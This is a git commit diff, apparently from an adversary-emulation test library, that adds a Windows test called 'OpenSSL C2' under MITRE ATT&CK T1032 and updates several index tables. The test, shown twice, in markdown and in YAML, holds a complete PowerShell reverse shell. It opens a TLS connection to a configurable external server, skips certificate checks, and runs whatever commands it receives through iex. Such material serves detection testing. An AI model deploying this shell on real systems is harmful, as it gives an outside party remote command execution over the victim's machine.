Generate docs from job=validate_atomics_generate_docs branch=master

2020-01-24 15:25:24 +00:00
parent 904b5a59a4
commit d4cb776600
11 changed files with 161 additions and 9 deletions
@@ -0,0 +1,53 @@
+# T1032 - Standard Cryptographic Protocol
+## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1032)
+<blockquote>Adversaries may explicitly employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if necessary secret keys are encoded and/or generated within malware samples/configuration files.</blockquote>
+
+## Atomic Tests
+
+- [Atomic Test #1 - OpenSSL C2](#atomic-test-1---openssl-c2)
+
+
+<br/>
+
+## Atomic Test #1 - OpenSSL C2
+Thanks to @OrOneEqualsOne for this quick C2 method.
+This is to test to see if a C2 session can be established using an SSL socket.
+More information about this technique, including how to set up the listener, can be found here:
+https://medium.com/walmartlabs/openssl-server-reverse-shell-from-windows-client-aee2dbfa0926
+
+**Supported Platforms:** Windows
+
+
+#### Inputs:
+| Name | Description | Type | Default Value | 
+|------|-------------|------|---------------|
+| server_ip | IP of the external server | String | 127.0.0.1|
+| server_port | The port to connect to on the external server | String | 443|
+
+
+#### Attack Commands: Run with `powershell`! 
+```
+$server_ip = #{server_ip}
+$server_port = #{server_port}
+$socket = New-Object Net.Sockets.TcpClient('#{server_ip}', #{server_port})
+$stream = $socket.GetStream()
+$sslStream = New-Object System.Net.Security.SslStream($stream,$false,({$True} -as [Net.Security.RemoteCertificateValidationCallback]))
+$sslStream.AuthenticateAsClient('fake.domain', $null, "Tls12", $false)
+$writer = new-object System.IO.StreamWriter($sslStream)
+$writer.Write('PS ' + (pwd).Path + '> ')
+$writer.flush()
+[byte[]]$bytes = 0..65535|%{0};
+while(($i = $sslStream.Read($bytes, 0, $bytes.Length)) -ne 0)
+{$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);
+$sendback = (iex $data | Out-String ) 2>&1;
+$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';
+$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);
+$sslStream.Write($sendbyte,0,$sendbyte.Length);$sslStream.Flush()}
+```
+
+
+
+
+
+
+<br/>
@@ -981,7 +981,8 @@
  - Atomic Test #4: DNS Large Query Volume [windows]
  - Atomic Test #5: DNS Regular Beaconing [windows]
  - Atomic Test #6: DNS Long Domain Query [windows]
- T1032 Standard Cryptographic Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1032 Standard Cryptographic Protocol](./T1032/T1032.md)
+  - Atomic Test #1: OpenSSL C2 [windows]
 - T1095 Standard Non-Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1065 Uncommonly Used Port](./T1065/T1065.md)
  - Atomic Test #1: Testing usage of uncommonly used port with PowerShell [windows]
@@ -28103,6 +28103,103 @@ command-and-control:
        command: |
          Set-Location $PathToAtomicsFolder
          .\T1071\src\T1071-dns-domain-length.ps1 -Domain #{domain} -Subdomain #{subdomain} -QueryType #{query_type}
+  T1032:
+    technique:
+      x_mitre_data_sources:
+      - Packet capture
+      - Netflow/Enclave netflow
+      - Malware reverse engineering
+      - Process use of network
+      - Process monitoring
+      - SSL/TLS inspection
+      name: Standard Cryptographic Protocol
+      description: Adversaries may explicitly employ a known encryption algorithm
+        to conceal command and control traffic rather than relying on any inherent
+        protections provided by a communication protocol. Despite the use of a secure
+        algorithm, these implementations may be vulnerable to reverse engineering
+        if necessary secret keys are encoded and/or generated within malware samples/configuration
+        files.
+      id: attack-pattern--4b74a1d4-b0e9-4ef1-93f1-14ecc6e2f5b5
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      - Windows
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_version: '1.0'
+      type: attack-pattern
+      x_mitre_detection: |-
+        SSL/TLS inspection is one way of detecting command and control traffic within some encrypted communication channels. (Citation: SANS Decrypting SSL) SSL/TLS inspection does come with certain risks that should be considered before implementing to avoid potential security issues such as incomplete certificate validation. (Citation: SEI SSL Inspection Risks)
+
+        If malware uses encryption with symmetric keys, it may be possible to obtain the algorithm and key from samples and use them to decode network traffic to detect malware communications signatures. (Citation: Fidelis DarkComet)
+
+        In general, analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. (Citation: University of Birmingham C2)
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_network_requirements: true
+      created: '2017-05-31T21:30:35.334Z'
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: command-and-control
+      external_references:
+      - external_id: T1032
+        source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1032
+      - source_name: SANS Decrypting SSL
+        description: Butler, M. (2013, November). Finding Hidden Threats by Decrypting
+          SSL. Retrieved April 5, 2016.
+        url: http://www.sans.org/reading-room/whitepapers/analyst/finding-hidden-threats-decrypting-ssl-34840
+      - source_name: SEI SSL Inspection Risks
+        description: Dormann, W. (2015, March 13). The Risks of SSL Inspection. Retrieved
+          April 5, 2016.
+        url: https://insights.sei.cmu.edu/cert/2015/03/the-risks-of-ssl-inspection.html
+      - source_name: Fidelis DarkComet
+        description: Fidelis Cybersecurity. (2015, August 4). Looking at the Sky for
+          a DarkComet. Retrieved April 5, 2016.
+        url: https://www.fidelissecurity.com/sites/default/files/FTA_1018_looking_at_the_sky_for_a_dark_comet.pdf
+      - source_name: University of Birmingham C2
+        description: Gardiner, J.,  Cova, M., Nagaraja, S. (2014, February). Command
+          & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
+        url: https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf
+      modified: '2019-07-19T18:55:09.403Z'
+      identifier: T1032
+    atomic_tests:
+    - name: OpenSSL C2
+      description: |
+        Thanks to @OrOneEqualsOne for this quick C2 method.
+        This is to test to see if a C2 session can be established using an SSL socket.
+        More information about this technique, including how to set up the listener, can be found here:
+        https://medium.com/walmartlabs/openssl-server-reverse-shell-from-windows-client-aee2dbfa0926
+      supported_platforms:
+      - windows
+      input_arguments:
+        server_ip:
+          description: IP of the external server
+          type: String
+          default: 127.0.0.1
+        server_port:
+          description: The port to connect to on the external server
+          type: String
+          default: 443
+      executor:
+        name: powershell
+        elevation_required: false
+        command: |
+          $server_ip = #{server_ip}
+          $server_port = #{server_port}
+          $socket = New-Object Net.Sockets.TcpClient('#{server_ip}', #{server_port})
+          $stream = $socket.GetStream()
+          $sslStream = New-Object System.Net.Security.SslStream($stream,$false,({$True} -as [Net.Security.RemoteCertificateValidationCallback]))
+          $sslStream.AuthenticateAsClient('fake.domain', $null, "Tls12", $false)
+          $writer = new-object System.IO.StreamWriter($sslStream)
+          $writer.Write('PS ' + (pwd).Path + '> ')
+          $writer.flush()
+          [byte[]]$bytes = 0..65535|%{0};
+          while(($i = $sslStream.Read($bytes, 0, $bytes.Length)) -ne 0)
+          {$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);
+          $sendback = (iex $data | Out-String ) 2>&1;
+          $sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';
+          $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);
+          $sslStream.Write($sendbyte,0,$sendbyte.Length);$sslStream.Flush()}
  T1065:
    technique:
      x_mitre_data_sources:
@@ -308,7 +308,7 @@
  - Atomic Test #6: sftp remote file copy (pull) [linux, macos]
 - [T1071 Standard Application Layer Protocol](./T1071/T1071.md)
  - Atomic Test #3: Malicious User Agents - Nix [linux, macos]
- T1032 Standard Cryptographic Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1032 Standard Cryptographic Protocol](./T1032/T1032.md)
 - T1095 Standard Non-Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1065 Uncommonly Used Port](./T1065/T1065.md)
  - Atomic Test #2: Testing usage of uncommonly used port [linux, macos]
@@ -19,7 +19,7 @@
 |  |  | [Trap](./T1154/T1154.md) |  | [Masquerading](./T1036/T1036.md) |  | [System Network Connections Discovery](./T1049/T1049.md) |  |  |  | Remote Access Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 |  |  | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | [Obfuscated Files or Information](./T1027/T1027.md) |  | [System Owner/User Discovery](./T1033/T1033.md) |  |  |  | [Remote File Copy](./T1105/T1105.md) |
 |  |  | [Web Shell](./T1100/T1100.md) |  | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |  |  |  |  | [Standard Application Layer Protocol](./T1071/T1071.md) |
-|  |  |  |  | [Process Injection](./T1055/T1055.md) |  |  |  |  |  | Standard Cryptographic Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+|  |  |  |  | [Process Injection](./T1055/T1055.md) |  |  |  |  |  | [Standard Cryptographic Protocol](./T1032/T1032.md) |
 |  |  |  |  | Redundant Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |  |  |  |  | Standard Non-Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 |  |  |  |  | Revert Cloud Instance [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |  |  |  |  | [Uncommonly Used Port](./T1065/T1065.md) |
 |  |  |  |  | [Rootkit](./T1014/T1014.md) |  |  |  |  |  | [Web Service](./T1102/T1102.md) |
@@ -331,7 +331,7 @@
  - Atomic Test #6: sftp remote file copy (pull) [linux, macos]
 - [T1071 Standard Application Layer Protocol](./T1071/T1071.md)
  - Atomic Test #3: Malicious User Agents - Nix [linux, macos]
- T1032 Standard Cryptographic Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1032 Standard Cryptographic Protocol](./T1032/T1032.md)
 - T1095 Standard Non-Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1065 Uncommonly Used Port](./T1065/T1065.md)
  - Atomic Test #2: Testing usage of uncommonly used port [linux, macos]
@@ -19,7 +19,7 @@
 |  |  | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | Indicator Removal from Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | [System Network Configuration Discovery](./T1016/T1016.md) |  |  |  | Remote Access Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 |  |  | [Rc.common](./T1163/T1163.md) |  | [Indicator Removal on Host](./T1070/T1070.md) |  | [System Network Connections Discovery](./T1049/T1049.md) |  |  |  | [Remote File Copy](./T1105/T1105.md) |
 |  |  | [Re-opened Applications](./T1164/T1164.md) |  | [Install Root Certificate](./T1130/T1130.md) |  | [System Owner/User Discovery](./T1033/T1033.md) |  |  |  | [Standard Application Layer Protocol](./T1071/T1071.md) |
-|  |  | Redundant Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | LC_MAIN Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |  |  | Standard Cryptographic Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+|  |  | Redundant Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | LC_MAIN Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |  |  | [Standard Cryptographic Protocol](./T1032/T1032.md) |
 |  |  | [Setuid and Setgid](./T1166/T1166.md) |  | [Launchctl](./T1152/T1152.md) |  |  |  |  |  | Standard Non-Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 |  |  | [Startup Items](./T1165/T1165.md) |  | [Masquerading](./T1036/T1036.md) |  |  |  |  |  | [Uncommonly Used Port](./T1065/T1065.md) |
 |  |  | [Trap](./T1154/T1154.md) |  | [Obfuscated Files or Information](./T1027/T1027.md) |  |  |  |  |  | [Web Service](./T1102/T1102.md) |
@@ -19,7 +19,7 @@
 |  | [Mshta](./T1170/T1170.md) | Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Launch Daemon](./T1160/T1160.md) | [DLL Search Order Hijacking](./T1038/T1038.md) | LLMNR/NBT-NS Poisoning and Relay [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Remote System Discovery](./T1018/T1018.md) | Taint Shared Content [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |  | Remote Access Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 |  | [PowerShell](./T1086/T1086.md) | [Emond](./T1519/T1519.md) | [New Service](./T1050/T1050.md) | [DLL Side-Loading](./T1073/T1073.md) | [Network Sniffing](./T1040/T1040.md) | [Security Software Discovery](./T1063/T1063.md) | Third-party Software [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |  | [Remote File Copy](./T1105/T1105.md) |
 |  | [Regsvcs/Regasm](./T1121/T1121.md) | External Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Parent PID Spoofing](./T1502/T1502.md) | [Deobfuscate/Decode Files or Information](./T1140/T1140.md) | [Password Filter DLL](./T1174/T1174.md) | [Software Discovery](./T1518/T1518.md) | Web Session Cookie [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |  | [Standard Application Layer Protocol](./T1071/T1071.md) |
-|  | [Regsvr32](./T1117/T1117.md) | [File System Permissions Weakness](./T1044/T1044.md) | Path Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Disabling Security Tools](./T1089/T1089.md) | [Private Keys](./T1145/T1145.md) | [System Information Discovery](./T1082/T1082.md) | [Windows Admin Shares](./T1077/T1077.md) |  |  | Standard Cryptographic Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+|  | [Regsvr32](./T1117/T1117.md) | [File System Permissions Weakness](./T1044/T1044.md) | Path Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Disabling Security Tools](./T1089/T1089.md) | [Private Keys](./T1145/T1145.md) | [System Information Discovery](./T1082/T1082.md) | [Windows Admin Shares](./T1077/T1077.md) |  |  | [Standard Cryptographic Protocol](./T1032/T1032.md) |
 |  | [Rundll32](./T1085/T1085.md) | [Hidden Files and Directories](./T1158/T1158.md) | [Plist Modification](./T1150/T1150.md) | Execution Guardrails [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Securityd Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Network Configuration Discovery](./T1016/T1016.md) | [Windows Remote Management](./T1028/T1028.md) |  |  | Standard Non-Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 |  | [Scheduled Task](./T1053/T1053.md) | [Hooking](./T1179/T1179.md) | Port Monitors [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Steal Application Access Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Network Connections Discovery](./T1049/T1049.md) |  |  |  | [Uncommonly Used Port](./T1065/T1065.md) |
 |  | [Scripting](./T1064/T1064.md) | [Hypervisor](./T1062/T1062.md) | [PowerShell Profile](./T1504/T1504.md) | Extra Window Memory Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Steal Web Session Cookie [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Owner/User Discovery](./T1033/T1033.md) |  |  |  | [Web Service](./T1102/T1102.md) |
@@ -728,7 +728,8 @@
  - Atomic Test #4: DNS Large Query Volume [windows]
  - Atomic Test #5: DNS Regular Beaconing [windows]
  - Atomic Test #6: DNS Long Domain Query [windows]
- T1032 Standard Cryptographic Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1032 Standard Cryptographic Protocol](./T1032/T1032.md)
+  - Atomic Test #1: OpenSSL C2 [windows]
 - T1095 Standard Non-Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1065 Uncommonly Used Port](./T1065/T1065.md)
  - Atomic Test #1: Testing usage of uncommonly used port with PowerShell [windows]
@@ -18,7 +18,7 @@
 |  | [Regsvcs/Regasm](./T1121/T1121.md) | External Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Path Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DLL Side-Loading](./T1073/T1073.md) | [Password Filter DLL](./T1174/T1174.md) | [Security Software Discovery](./T1063/T1063.md) | [Windows Admin Shares](./T1077/T1077.md) |  |  | Remote Access Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 |  | [Regsvr32](./T1117/T1117.md) | [File System Permissions Weakness](./T1044/T1044.md) | Port Monitors [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Deobfuscate/Decode Files or Information](./T1140/T1140.md) | [Private Keys](./T1145/T1145.md) | [Software Discovery](./T1518/T1518.md) | [Windows Remote Management](./T1028/T1028.md) |  |  | [Remote File Copy](./T1105/T1105.md) |
 |  | [Rundll32](./T1085/T1085.md) | [Hidden Files and Directories](./T1158/T1158.md) | [PowerShell Profile](./T1504/T1504.md) | [Disabling Security Tools](./T1089/T1089.md) | Steal Web Session Cookie [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Information Discovery](./T1082/T1082.md) |  |  |  | [Standard Application Layer Protocol](./T1071/T1071.md) |
-|  | [Scheduled Task](./T1053/T1053.md) | [Hooking](./T1179/T1179.md) | [Process Injection](./T1055/T1055.md) | Execution Guardrails [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Two-Factor Authentication Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Network Configuration Discovery](./T1016/T1016.md) |  |  |  | Standard Cryptographic Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+|  | [Scheduled Task](./T1053/T1053.md) | [Hooking](./T1179/T1179.md) | [Process Injection](./T1055/T1055.md) | Execution Guardrails [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Two-Factor Authentication Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Network Configuration Discovery](./T1016/T1016.md) |  |  |  | [Standard Cryptographic Protocol](./T1032/T1032.md) |
 |  | [Scripting](./T1064/T1064.md) | [Hypervisor](./T1062/T1062.md) | SID-History Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | [System Network Connections Discovery](./T1049/T1049.md) |  |  |  | Standard Non-Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 |  | [Service Execution](./T1035/T1035.md) | [Image File Execution Options Injection](./T1183/T1183.md) | [Scheduled Task](./T1053/T1053.md) | Extra Window Memory Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | [System Owner/User Discovery](./T1033/T1033.md) |  |  |  | [Uncommonly Used Port](./T1065/T1065.md) |
 |  | [Signed Binary Proxy Execution](./T1218/T1218.md) | LSASS Driver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Service Registry Permissions Weakness](./T1058/T1058.md) | [File Deletion](./T1107/T1107.md) |  | [System Service Discovery](./T1007/T1007.md) |  |  |  | [Web Service](./T1102/T1102.md) |